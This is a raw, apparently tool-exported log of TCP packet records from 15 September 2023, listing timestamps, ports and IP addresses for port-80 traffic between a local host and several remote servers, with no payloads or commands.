                                                                                                                                                                              Sep 15, 2023 07:26:14.213907957 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213924885 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213941097 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.213952065 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213965893 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.213999987 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.214019060 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.214050055 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.214054108 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.214096069 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.214129925 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.214170933 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.214179039 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.214220047 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.214262962 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.214308023 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.214313984 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.214355946 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.351942062 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.351968050 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.351984024 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352034092 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352049112 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352091074 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352103949 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352137089 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352144003 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352178097 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352178097 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352217913 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352236986 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352284908 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352319002 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352359056 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352392912 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352436066 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352441072 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352483034 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352502108 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352541924 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352575064 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352612972 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352678061 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352722883 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352736950 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352777004 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352811098 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352848053 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352904081 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.352945089 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.352977991 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353015900 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.353025913 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353066921 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.353071928 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353112936 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.353120089 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353163004 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.353204966 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353243113 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353246927 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.353281975 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.353316069 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.353354931 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354177952 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354235888 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354270935 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354310036 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354342937 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354382038 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354446888 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354465961 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354486942 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354500055 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354521990 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354558945 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354564905 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354603052 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.354649067 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.354687929 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385476112 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385519981 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385548115 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385562897 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385572910 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385615110 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385653019 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385679007 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385691881 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385718107 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385776043 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385823011 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385855913 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385900974 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385905027 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.385946989 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.385996103 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386044979 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386054993 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386099100 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386101961 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386137009 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386156082 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386199951 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386202097 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386249065 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386265993 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386307001 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386326075 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386368990 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386431932 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386477947 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386492968 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386540890 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386574984 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386620045 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386652946 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386678934 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.386713982 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386725903 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.386974096 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387020111 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387053013 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387099028 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387110949 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387157917 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387161016 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387200117 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387243986 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387263060 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387289047 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387300968 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387389898 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387435913 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387489080 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387533903 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387547016 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387590885 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387631893 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387676954 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387696028 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387739897 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387758017 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387803078 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387898922 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.387944937 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.387979031 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388021946 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388056040 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388104916 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388138056 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388171911 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388183117 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388211012 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388230085 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388274908 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388346910 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388394117 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388482094 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388561010 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388621092 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388650894 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388700962 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388720036 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388767004 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388853073 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.388899088 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.388967037 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.389012098 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.389158010 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.389206886 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.389240026 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.389286041 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.389476061 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.389525890 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524516106 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524549007 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524566889 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524585962 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524599075 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524604082 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524622917 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524627924 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524652004 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524669886 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524684906 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524684906 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524687052 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524703979 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524715900 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524725914 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524744034 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524749041 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524749041 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524761915 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524789095 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524789095 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524821997 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524821997 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524825096 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524877071 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524884939 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524902105 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524918079 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524935007 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.524935961 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524955034 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.524990082 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525012970 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525032043 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525063038 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525077105 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525079966 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525106907 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525125980 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525151014 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525180101 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525211096 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525230885 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525257111 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525259972 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525289059 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525305986 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525331020 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525341988 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525374889 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525388956 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525399923 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525418043 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525443077 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525460005 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525501013 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525532007 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525536060 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525551081 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525573015 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525583982 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525600910 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525616884 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525634050 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525634050 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525650024 CEST8049778217.79.184.35192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.525655031 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525665045 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.525701046 CEST4977880192.168.2.3217.79.184.35
                                                                                                                                                                              Sep 15, 2023 07:26:14.657264948 CEST4978080192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:14.793634892 CEST4978180192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:14.826782942 CEST8049775210.140.73.39192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.826941967 CEST4977580192.168.2.3210.140.73.39
                                                                                                                                                                              Sep 15, 2023 07:26:14.913690090 CEST804978093.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.913916111 CEST4978080192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:14.914197922 CEST4978080192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:14.971739054 CEST80497815.196.166.214192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:14.971836090 CEST4978180192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:14.972079039 CEST4978180192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:15.151398897 CEST80497815.196.166.214192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.151458025 CEST80497815.196.166.214192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.151568890 CEST4978180192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:15.151568890 CEST4978180192.168.2.35.196.166.214
                                                                                                                                                                              Sep 15, 2023 07:26:15.170527935 CEST804978093.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.170778990 CEST804978093.187.206.66192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.170840025 CEST4978080192.168.2.393.187.206.66
                                                                                                                                                                              Sep 15, 2023 07:26:15.348933935 CEST4978280192.168.2.396.91.204.114
                                                                                                                                                                              Sep 15, 2023 07:26:15.353369951 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.444314957 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.444482088 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.444704056 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.535567999 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546314001 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546358109 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546399117 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546438932 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546475887 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546480894 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.546480894 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.546482086 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.546519041 CEST8049783104.21.79.244192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.546578884 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.546580076 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.546580076 CEST4978380192.168.2.3104.21.79.244
                                                                                                                                                                              Sep 15, 2023 07:26:15.642765045 CEST8049763165.227.252.190192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:15.642852068 CEST4976380192.168.2.3165.227.252.190
                                                                                                                                                                              Sep 15, 2023 07:26:16.383022070 CEST804975039.99.233.155192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:16.383099079 CEST4975080192.168.2.339.99.233.155
                                                                                                                                                                              Sep 15, 2023 07:26:16.460165024 CEST4977980192.168.2.3198.100.146.220
                                                                                                                                                                              Sep 15, 2023 07:26:17.977427006 CEST8049741202.254.236.40192.168.2.3
                                                                                                                                                                              Sep 15, 2023 07:26:17.977519989 CEST4974180192.168.2.3202.254.236.40
                                                                                                                                                                              Sep 15, 2023 07:26:18.350785971 CEST4978280192.168.2.396.91.204.114
